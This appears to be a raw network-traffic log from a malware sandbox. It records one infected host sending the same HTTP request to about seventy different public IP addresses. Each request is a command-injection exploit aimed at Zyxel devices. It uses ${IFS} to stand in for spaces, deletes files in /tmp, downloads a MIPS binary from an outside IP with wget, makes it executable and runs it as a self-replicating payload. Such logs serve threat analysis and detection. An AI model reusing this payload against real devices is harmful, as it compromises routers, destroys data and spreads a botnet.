                                        Mar 31, 2024 09:20:16.076786995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        117192.168.2.235213632.194.117.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076813936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        118192.168.2.2358368153.87.152.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076853991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        119192.168.2.233838670.211.255.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076906919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        120192.168.2.235916480.65.135.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076961994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        121192.168.2.2353214111.83.51.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077003956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        122192.168.2.2351624145.26.134.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077037096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        123192.168.2.236025027.101.18.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077099085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        124192.168.2.2339578114.1.61.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077132940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        125192.168.2.234539675.254.163.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077183008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        126192.168.2.23490941.227.48.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077227116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        127192.168.2.234841447.7.189.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077266932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        128192.168.2.2357640182.66.238.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077300072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        129192.168.2.235886491.94.55.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077343941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        130192.168.2.233515431.48.233.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077410936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        131192.168.2.235673082.44.2.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077441931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        132192.168.2.235747667.48.39.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077512026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        133192.168.2.234208478.53.29.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077558994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        134192.168.2.2347208126.160.134.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077613115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        135192.168.2.235998231.237.8.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077646017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        136192.168.2.2336144198.204.106.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077675104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        137192.168.2.2339974180.5.204.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077718019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        138192.168.2.2348494120.36.191.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077759981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        139192.168.2.2356610205.115.135.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077795029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        140192.168.2.2359840177.105.176.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077850103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        141192.168.2.235144245.85.62.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077884912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        142192.168.2.233876689.39.30.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077934027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        143192.168.2.2359686182.17.138.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077972889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        144192.168.2.2354074223.83.245.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.077997923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        145192.168.2.235171819.197.176.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078028917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        146192.168.2.2342522101.74.2.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078094006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        147192.168.2.234826059.201.163.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078124046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        148192.168.2.235036051.212.198.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078186989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        149192.168.2.234641692.200.134.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078241110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        150192.168.2.2350824211.241.29.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078283072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        151192.168.2.2353946182.20.92.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078330994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        152192.168.2.2336656213.50.210.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078386068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        153192.168.2.2349730223.223.128.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078423023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        154192.168.2.233904624.96.34.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078485012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        155192.168.2.234056095.48.89.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078557014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        156192.168.2.233559413.191.159.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078572989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        157192.168.2.236031063.192.68.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078614950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        158192.168.2.2332936115.37.158.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078646898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        159192.168.2.235577454.242.250.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078699112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        160192.168.2.2346958171.140.76.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078742981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        161192.168.2.2333426137.232.223.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078789949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        162192.168.2.2336784141.122.152.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078819990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        163192.168.2.2351292121.242.143.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078867912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        164192.168.2.235268884.155.222.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078902006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        165192.168.2.2346328166.95.229.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.078952074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        166192.168.2.234153636.141.134.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079003096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        167192.168.2.2336574189.125.10.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079062939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        168192.168.2.234226493.193.182.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079099894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        169192.168.2.2339130163.159.170.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079127073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        170192.168.2.2334718118.87.103.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079176903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        171192.168.2.2339488135.199.189.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079245090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        172192.168.2.2350248216.34.128.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079296112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        173192.168.2.234176297.70.178.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079358101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        174192.168.2.235734025.94.62.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079401016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        175192.168.2.234882023.156.49.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079458952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        176192.168.2.233314067.33.189.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079488039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        177192.168.2.2338608151.9.155.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079536915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        178192.168.2.2356050219.35.231.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079576969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        179192.168.2.2353560200.110.69.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079627037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        180192.168.2.2352452160.25.178.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079672098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        181192.168.2.234038664.22.42.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079710960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        182192.168.2.2338434169.57.237.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079766989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        183192.168.2.2353038190.205.190.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079798937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        184192.168.2.2335460180.249.198.8443
                                        TimestampBytes transferredDirectionData
